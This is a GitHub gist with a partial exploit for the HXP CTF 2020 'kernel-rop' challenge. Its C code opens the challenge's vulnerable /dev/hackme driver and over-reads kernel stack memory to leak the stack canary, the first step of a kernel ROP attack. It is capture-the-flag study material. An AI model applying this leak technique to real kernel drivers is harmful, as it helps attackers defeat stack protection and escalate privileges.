Last active
September 2, 2022 09:30
-
-
Save brant-ruan/a36de55493adafd8e9d78c1e2f660dad to your computer and use it in GitHub Desktop.
HXP CTF 2020 >> kernel-rop | partial exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdbool.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| char *VULN_DRV = "/dev/hackme"; | |
| int64_t global_fd = 0; | |
| uint64_t cookie = 0; | |
| uint8_t cookie_off = 16; | |
| void open_dev() { | |
| global_fd = open(VULN_DRV, O_RDWR); | |
| if (global_fd < 0) { | |
| printf("[-] failed to open %s\n", VULN_DRV); | |
| exit(-1); | |
| } else { | |
| printf("[+] successfully opened %s\n", VULN_DRV); | |
| } | |
| } | |
| void leak_cookie() { | |
| uint8_t sz = 40; | |
| uint64_t leak[sz]; | |
| printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak)); | |
| uint64_t data = read(global_fd, leak, sizeof(leak)); | |
| cookie = leak[cookie_off]; | |
| printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off); | |
| if(!cookie) { | |
| puts("[-] failed to leak stack canary!"); | |
| exit(-1); | |
| } | |
| } | |
| int main(int argc, char **argv) { | |
| open_dev(); | |
| leak_cookie(); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment